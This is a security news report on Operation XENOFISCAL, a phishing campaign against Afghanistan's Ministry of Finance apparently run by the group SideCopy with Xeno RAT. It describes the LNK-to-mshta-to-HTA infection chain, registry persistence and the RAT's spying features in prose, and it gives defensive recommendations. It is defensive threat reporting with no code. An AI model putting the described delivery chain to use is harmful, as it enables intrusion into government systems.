Researchers at Seqrite Labs have disclosed details of a targeted phishing campaign against Afghanistan’s Ministry of Finance, provincial revenue and finance departments, and Pashto‑speaking government employees. According to the researchers, the attack is likely conducted by the Pakistani group SideCopy, which is using the open‑source remote access trojan Xeno RAT version 1.8.7. The campaign has been codenamed Operation XENOFISCAL. Public‑sector organizations in Afghanistan and South Asia should immediately inspect their infrastructure for signs of compromise and strengthen filtering of incoming attachments.
Infection chain: from ZIP archive to full control
As Seqrite Labs researcher Dikshit Panchal reports, the attack begins with the delivery of a ZIP archive containing a malicious Windows shortcut (LNK file) whose name is in Pashto — the primary language used for official paperwork in Afghan government agencies. The choice of language indicates the attackers’ deep familiarity with the target environment.
The technical infection chain is structured as follows:
- When executed, the LNK file invokes the system utility mshta.exe to download a remote HTA (HTML Application) file from a compromised domain belonging to an Afghan educational institution.
- The HTA file runs obfuscated JavaScript code directly in memory, minimizing artifacts left on disk.
- The malware achieves persistence in the system via the Windows registry, disguising itself as a Microsoft Edge process.
- Using a DLL‑based loader, Xeno RAT 1.8.7 is installed, and a decoy document is displayed to the user as a distraction.
Capabilities of Xeno RAT
Xeno RAT is an open‑source remote access trojan that communicates with its command‑and‑control server over the TCP protocol. According to the researchers, version 1.8.7, observed in this campaign, offers a broad feature set:
- Download and execution of external DLL modules
- Keystroke logging and screen capture
- Clipboard monitoring
- Access to webcam and microphone
- File operations and data exfiltration to the server
- Network tunneling via a SOCKS5 proxy
- Collection of information about installed antivirus solutions
- Creation of scheduled tasks for automatic startup
- Removal of persistence mechanisms and self‑deletion
The combination of antivirus reconnaissance with SOCKS5 tunneling indicates that the operators purposefully adapt their tactics to the victim’s security controls and use compromised hosts as intermediate nodes for traffic proxying.
Threat context: SideCopy and Transparent Tribe
According to the researchers, SideCopy is a group presumed to be linked to Pakistan and operating within the broader structure of Transparent Tribe (also known as APT36). It should be noted that this attribution is based on a single research source and has not been independently confirmed.
The Operation XENOFISCAL campaign is viewed as part of a wider cluster of malicious activity targeting government entities in South Asia. In April 2025, the same group was reportedly linked to attacks on various sectors in India using Xeno RAT, Spark RAT, and CurlBack RAT.
In parallel, reports emerged of a separate phishing operation aimed at Indian military infrastructure. In this campaign, according to unverified information, malicious Linux .desktop files were distributed via WhatsApp using lures related to armored vehicle procurements. The infection chain resulted in deployment of a Go‑based implant referred to as DeskRAT. However, these details are based on a single publication and require independent verification.
Impact assessment
The primary risk group comprises Afghan government financial institutions, including the Ministry of Finance, provincial revenue and finance departments, and individual officials working with Pashto‑language documents. Compromise of financial authorities could lead to the leakage of budgetary data, information on international transactions, and internal correspondence.
The use of a compromised domain of an educational institution as an intermediate delivery node indicates that the infrastructure of Afghanistan’s education sector may also be compromised and requires auditing.
Protection recommendations
- Block execution of mshta.exe via AppLocker or Windows Defender Application Control policies on workstations where this utility is not required for business processes.
- Attachment filtering: configure mail gateways to block ZIP archives containing LNK files. This is one of the most common delivery vectors in targeted attacks.
- Registry monitoring: track the creation of suspicious autorun keys, especially those masquerading as Microsoft Edge processes.
- Network traffic control: detect anomalous TCP connections and SOCKS5 tunnels originating from workstations that are not expected to initiate such traffic.
- Audit of scheduled tasks: check for unusual tasks in the Windows Task Scheduler that could be used by Xeno RAT for persistence.
- Staff awareness training: provide targeted training for staff in financial agencies on the risks of opening ZIP attachments containing LNK files, especially those received from unknown senders.
Organizations operating in the public sector of Afghanistan and South Asia are advised to prioritize checking workstations for atypical HTA downloads via mshta.exe, suspicious registry keys impersonating Microsoft Edge, and outbound TCP connections exhibiting signs of SOCKS5 tunneling. If any of these indicators are detected, the host should be isolated and a full incident investigation carried out.
